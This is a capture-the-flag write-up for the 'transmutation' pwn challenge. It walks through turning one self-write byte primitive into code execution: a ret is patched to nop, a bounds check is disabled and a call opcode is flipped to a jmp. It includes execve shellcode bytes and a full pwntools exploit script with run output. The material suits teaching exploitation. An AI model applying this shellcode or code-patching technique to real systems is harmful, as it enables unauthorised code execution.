pwn · free · hard

transmutation

b01lersc

Task: 28-line C program exposing a single byte-write primitive into the first 73 bytes of chall(), whose page is mprotect'd RWX. Solution: patch the final ret to nop so chall falls through into main (creating an infinite write loop), neutralize the LEN bounds check by zeroing a jge displacement, plant execve shellcode after _fini, and flip one byte to transmute main's call chall into jmp short → trampoline → shellcode.

$ ls tags/ techniques/
single_byte_write_primitive  ret_to_nop_fallthrough  call_to_jmp_opcode_flip  jge_neutralization  infinite_write_loop  post_fini_shellcode_placement

transmutation — b01lersc (BCTF 2026)

Description

To turn one program into another... is it even possible?

ncat --ssl transmutation.opus4-7.b01le.rs 8443

We are given a tiny C program (28 lines) together with its compiled binary (chall, no PIE, partial RELRO) and loader/libc. Each TCP connection spawns a fresh process, reads exactly two bytes (a value c and an offset i), and if i < LEN writes c into the function chall itself. The whole code page is made RWX beforehand. The goal is to execute code.

File list

 File                            |   Purpose
---------------------------------------------------------------
 chall.c                         | 28-line source of the binary (shown below)
 chall                           | Compiled ELF, no PIE, partial RELRO
 libc.so.6, ld-linux-x86-64.so.2 | Runtime libraries (unused by our exploit)
 Dockerfile                      | Remote runs under pwn.red/jail (chroot, uid 1000, cwd /app)
 flag.txt                        | Flag file at /app/flag.txt on the remote

Source

#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>

#define MAIN ((char *)main)
#define CHALL ((char *)chall)
#define LEN (MAIN - CHALL)

int main(void);

void chall(void) {
    char c = getchar();
    unsigned char i = getchar();
    if (i < LEN) {
        CHALL[i] = c;
    }
}

int main(void) {
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);
    setbuf(stderr, NULL);
    mprotect((char *)((long)CHALL & ~0xfff), 0x1000,
             PROT_READ | PROT_WRITE | PROT_EXEC);
    chall();
    return 0;
}

Two properties jump out immediately:

  1. main calls chall exactly once. No loop. So a single TCP connection naively gives us one byte-write and then exit(0).
  2. LEN = main - chall = 0x49 (73 bytes). The bounds check restricts us to writing inside chall itself — we cannot write into main, _fini or anywhere else (initially).

If we want to win in one session, we have to turn that one write into many writes and extend our reach. This is the "transmutation."

Analysis

Reverse-engineering chall and main

0000000000401146 <chall>:
  401146: 55                       push  rbp
  401147: 48 89 e5                 mov   rbp, rsp
  40114a: 48 83 ec 10              sub   rsp, 0x10
  40114e: e8 ed fe ff ff           call  0x401040 <getchar@plt>
  401153: 88 45 ff                 mov   [rbp-1], al        ; c
  401156: e8 e5 fe ff ff           call  0x401040 <getchar@plt>
  40115b: 88 45 fe                 mov   [rbp-2], al        ; i
  40115e: 0f b6 55 fe              movzx edx, byte [rbp-2]
  401162: 48 8d 05 26 00 00 00     lea   rax, [rip+0x26]    ; &main
  401169: 48 8d 0d d6 ff ff ff     lea   rcx, [rip-0x2a]    ; &chall
  401170: 48 29 c8                 sub   rax, rcx           ; LEN
  401173: 48 39 c2                 cmp   rdx, rax
  401176: 7d 14                    jge   0x40118c           ; <-- bounds check!
  401178: 0f b6 45 fe              movzx eax, byte [rbp-2]
  40117c: 48 8d 15 c3 ff ff ff     lea   rdx, [rip-0x3d]    ; &chall
  401183: 48 01 c2                 add   rdx, rax
  401186: 0f b6 45 ff              movzx eax, byte [rbp-1]
  40118a: 88 02                    mov   [rdx], al          ; the WRITE
  40118c: 90                       nop
  40118d: c9                       leave
  40118e: c3                       ret                       ; <-- last byte of chall

000000000040118f <main>:
  40118f: 55                       push  rbp
  401190: 48 89 e5                 mov   rbp, rsp
  ...  (three setbuf calls and the mprotect)
  4011e9: e8 62 fe ff ff           call  mprotect
  4011ee: e8 53 ff ff ff           call  0x401146 <chall>   ; <-- flip this!
  4011f3: b8 00 00 00 00           mov   eax, 0x0
  4011f8: 5d                       pop   rbp
  4011f9: c3                       ret

00000000004011fc <_fini>:
  4011fc: 48 83 ec 08              sub   rsp, 0x8
  401200: 48 83 c4 08              add   rsp, 0x8
  401204: c3                       ret
                                    ; 0x401205..0x401fff is zero-filled,
                                    ; still on the RWX page.

Memory layout of the RWX page (0x401000..0x401fff)

 offset           |   code
---------------------------------------------------------------
 chall+0x00  (0x401146) | chall() prologue
 chall+0x30  (0x401176) | 7d 14       jge +0x14   <-- LEN check
 chall+0x31  (0x401177) |    ^ displacement byte we overwrite with 0x00
 chall+0x48  (0x40118e) | c3          ret         <-- patch to 0x90 (nop)
 chall+0x49  (0x40118f) | ======== main() begins ========
 chall+0xA8  (0x4011EE) | e8 53 ff ff ff  call chall  <-- flip 0xE8 -> 0xEB
 chall+0xAD  (0x4011F3) | main epilogue
 chall+0xB6  (0x4011FC) | ======== _fini() ========
 chall+0xBE  (0x401204) | c3          ret (end of _fini)
 chall+0xBF  (0x401205) | 00 00 00 ...  <-- 25-byte shellcode goes here
 chall+0xFD  (0x401243) | 00 00        <-- 2-byte trampoline `eb c0` here

All of this is inside the same RWX page (0x401000..0x401fff), so every address we touch is both writable and executable.
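The offsets in the table are plain subtraction from chall's base address. A minimal sketch that recomputes them from the disassembly addresses and reports which ones the unpatched bounds check would allow (the names CHALL, MAIN, off and targets are illustrative, not taken from the challenge files):

```python
# Addresses taken from the disassembly above; the names are illustrative.
CHALL = 0x401146
MAIN = 0x40118F
LEN = MAIN - CHALL  # the bound enforced by `if (i < LEN)`


def off(addr: int) -> int:
    """Return the index i such that CHALL[i] is the byte at addr."""
    return addr - CHALL


targets = {
    "jge displacement": off(0x401177),
    "ret": off(0x40118E),
    "call opcode": off(0x4011EE),
    "shellcode start": off(0x401205),
    "trampoline": off(0x401243),
}

for name, o in targets.items():
    status = "reachable at once" if o < LEN else "needs the check disabled"
    print(f"{name:17s} chall+0x{o:02X}  {status}")
```

Every offset, including the trampoline's second byte at 0xFE, fits in the unsigned char i, which is why a single page-local index is enough for the whole exploit.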

Why a single write is not enough

The process reads exactly two bytes, performs one guarded write, then chall returns, main returns, and exit(0) is called. We never get a second chance. The only way to win in one connection is to modify chall so it keeps running — specifically, so that it keeps consuming pairs of bytes from stdin and keeps writing them.

Creating the infinite loop (the first "transmutation")

Look at the addresses around the end of chall:

40118e: c3                       ret      <-- chall's return
40118f: 55                       push rbp <-- main's first byte

chall ends and main begins immediately after. If we replace the ret (0xc3) at offset 0x48 with 0x90 (nop), chall falls through into main. Main runs its prologue, calls setbuf × 3, calls mprotect (a harmless no-op the second time), and then calls chall again. Chall reads two more bytes, writes one more byte, falls through into main again, … forever. We have converted one write into infinitely many writes by paying a single byte.

This is the punchline of the challenge name: by flipping one byte we have literally transmuted one program (a write-then-exit) into another (a write-loop).
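One caveat to "forever": the patched ret never pops the return address, so each lap leaves a little more on the stack. The sketch below tracks rsp through one lap. It assumes main allocates no locals (suggested by its pop rbp / ret epilogue, although the middle of main is elided above) and that the library calls are stack-neutral; the function name is made up for illustration.

```python
def rsp_after_one_lap(rsp: int) -> int:
    """Track rsp from one chall entry to the next, with ret patched to nop."""
    entry = rsp
    rsp -= 8       # chall: push rbp
    rbp = rsp      # chall: mov rbp, rsp
    rsp -= 0x10    # chall: sub rsp, 0x10
    rsp = rbp + 8  # chall: leave (mov rsp, rbp ; pop rbp)
    assert rsp == entry  # the old return address is still on top, never popped
    rsp -= 8       # main: push rbp (reached by falling through the nop)
    rsp -= 8       # main: call chall pushes a fresh return address
    return rsp


start = 0x7FFF_FFFF_E000  # arbitrary example value, not a real stack address
per_lap = start - rsp_after_one_lap(start)
print(f"{per_lap} bytes of stack consumed per write")
```

Under those assumptions the few dozen writes this exploit needs cost well under a kilobyte of stack, so the loop is effectively unbounded for our purposes.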

Extending reach: neutralizing the bounds check

The loop alone is not enough — we can only touch offsets 0..0x48 inside chall, and there is nothing interesting to patch there except the things we already patched. We need to write into main (to hijack its call chall) and into the zero-padded region after _fini (for the shellcode).

The bounds check is:

401173: 48 39 c2    cmp  rdx, rax
401176: 7d 14       jge  +0x14     ; skip the write if i >= LEN

The jge takes a signed 8-bit displacement. Offset 0x31 in chall holds the displacement byte 0x14. Overwriting it with 0x00 turns the instruction into jge +0x00, which is functionally a nop regardless of flags — control simply falls through to the next instruction, which is the write. The check is now inert and i is effectively an unsigned byte that can index any offset 0..255 from chall. That range covers:

chall   (offset 0x00..0x48)
main    (offset 0x49..0xB5)
_fini   (offset 0xB6..0xBE)
zeros   (offset 0xBF..0xFF)   ← writable & executable, perfect for shellcode
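To make the effect of the patch concrete, here is a toy model of chall's guarded store. It is a sketch, not an emulator: it only distinguishes the original displacement 0x14 (the branch skips the store) from the patched 0x00 (the branch lands on the store), and the helper names are invented for illustration.

```python
LEN = 0x49           # main - chall
JGE_DISP_OFF = 0x31  # offset of the jge displacement byte inside chall


def make_image() -> bytearray:
    """256-byte stand-in for chall[0x00..0xFF]; only the jge displacement is modelled."""
    img = bytearray(256)
    img[JGE_DISP_OFF] = 0x14
    return img


def guarded_write(img: bytearray, c: int, i: int) -> bool:
    """Mimic one pass through chall; return True if the store happened."""
    branch_taken = i >= LEN            # cmp rdx, rax ; jge
    disp = img[JGE_DISP_OFF]
    if branch_taken and disp == 0x14:  # original code: jump over the store
        return False
    if branch_taken and disp != 0x00:  # any other target is outside this model
        raise ValueError("unmodelled jge displacement")
    img[i] = c                         # mov [rdx], al
    return True


img = make_image()
print(guarded_write(img, 0xEB, 0xA8))  # False: 0xA8 is in main and the check is active
print(guarded_write(img, 0x00, 0x31))  # True: 0x31 < LEN, so the check itself is patchable
print(guarded_write(img, 0xEB, 0xA8))  # True: the branch now falls through to the store
```

The middle call is the important one: the displacement byte lives inside the 73 bytes the check still permits, so the guard can be used to disable itself.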

Planting the shellcode

25 bytes of classic execve("/bin//sh", ["/bin//sh", NULL], NULL) shellcode go at offset 0xBF (= 0x401205), which is in the zero-padded tail of the RWX page:

50                     push rax                 ; 8 zero bytes as NUL terminator (rax = 0, mprotect's return value)
48 31 d2               xor  rdx, rdx            ; envp = NULL
48 bf 2f 62 69 6e 2f 2f 73 68
                       movabs rdi, "/bin//sh"
57                     push rdi                 ; place string on stack
54 5f                  push rsp / pop rdi       ; rdi -> "/bin//sh"
52 57 54 5e            push rdx / push rdi / push rsp / pop rsi
                                                ; rsi -> [&str, NULL]
b0 3b                  mov  al, 0x3b            ; sys_execve (upper bits of rax are still 0)
0f 05                  syscall
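A quick sanity check of the listing, written as a sketch: it rebuilds the bytes instruction by instruction, confirms the length and the embedded path, and checks that the payload ends before the trampoline slot. SC_OFF and TRAMP_OFF are the chall-relative offsets used throughout this writeup.

```python
# The 25 bytes from the listing above, grouped per instruction.
shellcode = bytes.fromhex(
    "50"                    # push rax
    "4831d2"                # xor rdx, rdx
    "48bf2f62696e2f2f7368"  # movabs rdi, "/bin//sh"
    "57"                    # push rdi
    "545f"                  # push rsp ; pop rdi
    "5257545e"              # push rdx ; push rdi ; push rsp ; pop rsi
    "b03b"                  # mov al, 0x3b
    "0f05"                  # syscall
)

SC_OFF = 0xBF     # chall+0xBF = 0x401205
TRAMP_OFF = 0xFD  # chall+0xFD = 0x401243

last = SC_OFF + len(shellcode) - 1
print(len(shellcode), hex(last))  # 25 0xd7
print(shellcode[6:14])            # b'/bin//sh'
assert last < TRAMP_OFF           # shellcode ends before the trampoline slot
```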

The call→jmp opcode flip (the second "transmutation")

Main calls chall at 0x4011EE:

4011ee: e8 53 ff ff ff    call 0x401146 <chall>

The opcode e8 is "call rel32" with a 32-bit signed displacement 0xffffff53 (= -0xAD, i.e. back to chall at 0x401146).
The opcode eb is "jmp rel8": it takes a single signed byte as displacement, so the instruction is only two bytes long and the remaining three bytes of the old call are never decoded. If we flip only the e8 byte to eb, the instruction becomes:

4011ee: eb 53             jmp short 0x401243
4011f0: ff ff ff          (dead bytes, never decoded)

0x401243 is offset 0xFD in chall — inside the zero-padded region. We place a 2-byte trampoline there:

401243: eb c0             jmp short 0x401205   ; -0x40, into our shellcode
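The three branch targets above follow from the usual rule that a relative branch is measured from the end of the instruction. A small sketch that decodes them with the standard struct module (the two helper functions are illustrative and handle only these two opcodes):

```python
import struct


def call_rel32_target(addr: int, code: bytes) -> int:
    """Target of `e8 rel32` located at addr (instruction length 5)."""
    assert code[0] == 0xE8
    (disp,) = struct.unpack("<i", code[1:5])  # signed 32-bit little-endian
    return addr + 5 + disp


def jmp_rel8_target(addr: int, code: bytes) -> int:
    """Target of `eb rel8` located at addr (instruction length 2)."""
    assert code[0] == 0xEB
    (disp,) = struct.unpack("<b", code[1:2])  # signed 8-bit
    return addr + 2 + disp


original = bytes.fromhex("e853ffffff")
patched = bytes([0xEB]) + original[1:]  # only the opcode byte differs
trampoline = bytes.fromhex("ebc0")

print(hex(call_rel32_target(0x4011EE, original)))  # 0x401146
print(hex(jmp_rel8_target(0x4011EE, patched)))     # 0x401243
print(hex(jmp_rel8_target(0x401243, trampoline)))  # 0x401205
```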

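Why the detour through a trampoline? Reach is not the problem: jmp rel8 covers -128..+127 bytes, and from 0x4011F0 (the address after the jmp short) to the shellcode at 0x401205 is only +0x15, so a direct jmp +0x15 would fit. The catch is that we patch one byte per loop iteration, and main executes the instruction at 0x4011EE between any two writes. Rewriting the displacement byte first would leave a call rel32 with displacement 0xffffff15, which targets 0x401108 instead of chall and breaks the write loop; flipping the opcode first would jump to 0x401243 immediately, before the displacement could be changed. The trampoline sidesteps the ordering problem: we only overwrite the single opcode byte (e8 → eb) and never touch the existing displacement 0x53.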

0x53 was already there as the low byte of the call displacement; it happens to point to 0x401243, which is a convenient "landing pad" address to hide our trampoline in. That the existing displacement byte lines up so nicely with a reachable free spot is the elegance of the whole trick.
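A direct jmp to the shellcode would need two bytes changed at 0x4011EE, but the primitive changes one byte per lap and main executes that instruction between writes. The sketch below decodes the intermediate state for either ordering; decode is a hypothetical helper that understands only the two opcodes involved.

```python
import struct

SITE = 0x4011EE  # address of main's `call chall`


def decode(code: bytes) -> str:
    """Decode `e8 rel32` or `eb rel8` at SITE into 'mnemonic target'."""
    if code[0] == 0xE8:
        (disp,) = struct.unpack("<i", code[1:5])
        return f"call {SITE + 5 + disp:#x}"
    if code[0] == 0xEB:
        (disp,) = struct.unpack("<b", code[1:2])
        return f"jmp {SITE + 2 + disp:#x}"
    raise ValueError("opcode outside this sketch")


original = bytearray.fromhex("e853ffffff")

disp_first = bytearray(original)
disp_first[1] = 0x15    # displacement patched, opcode still e8
opcode_first = bytearray(original)
opcode_first[0] = 0xEB  # opcode patched, displacement still 0x53

print(decode(bytes(original)))      # call 0x401146
print(decode(bytes(disp_first)))    # call 0x401108
print(decode(bytes(opcode_first)))  # jmp 0x401243
```

Patching the displacement first sends the call away from chall and ends the write loop, so the opcode has to go first, and then control reaches 0x401243 on the very next lap. Code must already be waiting there, and the trampoline is that code.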

Order of operations matters

  1. Write ret → nop first (offset 0x48). Until this happens we only get one write per process.
  2. Neutralize the LEN check (offset 0x31) before writing anywhere ≥ 0x49, otherwise those writes are silently discarded.
  3. Plant shellcode and trampoline (offsets 0xBF…0xD7, then 0xFD/0xFE) while main still loops calmly via call chall.
  4. Flip call → jmp (offset 0xA8) as the final step. The very next iteration of main runs jmp short +0x53 → trampoline → shellcode, and we drop into /bin/sh.
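The ordering rules above can be checked mechanically. This is a sketch that builds the (value, offset) pairs in that order and asserts each constraint, using only the standard library; build_pairs and the constant names are illustrative.

```python
LEN = 0x49
SHELLCODE = bytes.fromhex("504831d248bf2f62696e2f2f736857545f5257545eb03b0f05")


def build_pairs() -> list[tuple[int, int]]:
    """Return the (value, offset) writes in the order the steps above require."""
    pairs = [(0x90, 0x48)]                                     # 1. ret -> nop
    pairs.append((0x00, 0x31))                                 # 2. jge displacement -> 0
    pairs += [(b, 0xBF + k) for k, b in enumerate(SHELLCODE)]  # 3. shellcode
    pairs += [(0xEB, 0xFD), (0xC0, 0xFE)]                      # 3. trampoline
    pairs.append((0xEB, 0xA8))                                 # 4. call -> jmp
    return pairs


pairs = build_pairs()
offsets = [i for _, i in pairs]
first_far = next(k for k, i in enumerate(offsets) if i >= LEN)

assert offsets[0] == 0x48               # the loop exists before anything else
assert offsets.index(0x31) < first_far  # check disabled before any far write
assert offsets[-1] == 0xA8              # the opcode flip is last

payload = b"".join(bytes(p) for p in pairs)  # two bytes on the wire per write
print(len(pairs), len(payload))
```

Because stdin is unbuffered in the target, the whole payload can be sent in one go; each lap consumes exactly one pair.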

Solution

Each "write" consumes exactly two bytes on stdin: (value, offset). The full exploit is simply a scripted sequence of 30 such pairs (2 patches to chall, 25 shellcode bytes, 2 trampoline bytes, 1 opcode flip), 60 bytes in total.

#!/usr/bin/env python3
"""
transmutation - b01lersc

Single-byte write primitive into the first 0x49 bytes of chall().
The chall page is mprotect'd RWX, so we can self-modify code.

Chain:
  1. ret -> nop at chall+0x48 (chall falls through into main -> infinite loop)
  2. jge +0x14 -> jge +0x00 at chall+0x31 (LEN bounds check becomes a no-op)
  3. Write 25-byte execve("/bin//sh") shellcode at chall+0xBF (=0x401205)
  4. Place 2-byte trampoline `eb c0` at chall+0xFD (=0x401243), jumps to 0x401205
  5. Flip main's `call chall` (e8 53 ff ff ff) to `jmp short +0x53` (eb 53 ff ff ff)
     -> trampoline -> shellcode -> /bin/sh
"""
from pwn import *

context.arch = 'amd64'
context.log_level = 'info'

HOST = 'transmutation.opus4-7.b01le.rs'
PORT = 8443

# execve("/bin//sh", ["/bin//sh", NULL], NULL) - 25 bytes
shellcode = bytes([
    0x50,                                # push rax
    0x48, 0x31, 0xd2,                    # xor rdx, rdx
    0x48, 0xbf, 0x2f, 0x62, 0x69, 0x6e,
    0x2f, 0x2f, 0x73, 0x68,              # movabs rdi, "/bin//sh"
    0x57,                                # push rdi
    0x54, 0x5f,                          # push rsp ; pop rdi
    0x52, 0x57, 0x54, 0x5e,              # push rdx ; push rdi ; push rsp ; pop rsi
    0xb0, 0x3b,                          # mov al, 0x3b (sys_execve)
    0x0f, 0x05,                          # syscall
])
assert len(shellcode) == 25

SC_OFF = 0xBF     # shellcode offset (= 0x401205)
TRAMP_OFF = 0xFD  # trampoline offset (= 0x401243)
CALL_OFF = 0xA8   # offset of `call chall` opcode byte in main (= 0x4011EE)


def write_byte(io, c: int, i: int):
    """Ask chall() to write byte c at chall[i]."""
    io.send(bytes([c & 0xff, i & 0xff]))


def pwn(io):
    # 1. ret -> nop => main keeps calling chall forever
    write_byte(io, 0x90, 0x48)

    # 2. jge +0x14 -> jge +0x00 => LEN check bypassed
    write_byte(io, 0x00, 0x31)

    # 3. drop shellcode into the zero-padded area after _fini
    for k, b in enumerate(shellcode):
        write_byte(io, b, SC_OFF + k)

    # 4. trampoline `eb c0` at chall+0xFD -> jumps -0x40 into shellcode
    write_byte(io, 0xEB, TRAMP_OFF)
    write_byte(io, 0xC0, TRAMP_OFF + 1)

    # 5. transmute `call chall` (e8 ..) into `jmp short +0x53` (eb ..)
    write_byte(io, 0xEB, CALL_OFF)
    # next main iteration executes our shellcode


if __name__ == '__main__':
    import sys, time

    if len(sys.argv) > 1 and sys.argv[1] == 'local':
        io = process('./chall')
    else:
        io = remote(HOST, PORT, ssl=True)

    pwn(io)
    io.sendline(b'cat /app/flag.txt; exit')
    time.sleep(2)
    print(io.recvall(timeout=5).decode(errors='replace'))

Running against the remote:

$ python3 exploit.py
[+] Opening connection to transmutation.opus4-7.b01le.rs on port 8443: Done
bctf{CPU_0pt1m1z3r5_H4T3_th15_0n3_51mp13_tr1ck_5519225335}

A note on self-modifying code and CPU pipelines

The challenge flag — "CPU optimizers hate this one simple trick" — is a nod to the fact that on x86/x86-64, self-modifying code does take effect even for instructions very close to the one currently executing, because the architecture is specified to snoop stores against the prefetch/decode queue and invalidate it. That is an unusually strong guarantee compared with most RISC ISAs (ARM/RISC-V require explicit cache flushes and isb/fence.i). It is exactly what lets us patch main's call chall a few bytes before it is fetched and have the CPU honour the new opcode on the very next iteration.

The second "simple trick" is the call rel32 → jmp rel8 flip: the opcode sits in the same first-byte slot, the patched site still occupies the same 5 bytes (jmp rel8 is only 2 bytes long; the remaining 3 bytes are simply unreachable), and the reused displacement byte points to a convenient code cave. One byte changes, and the instruction means something completely different.
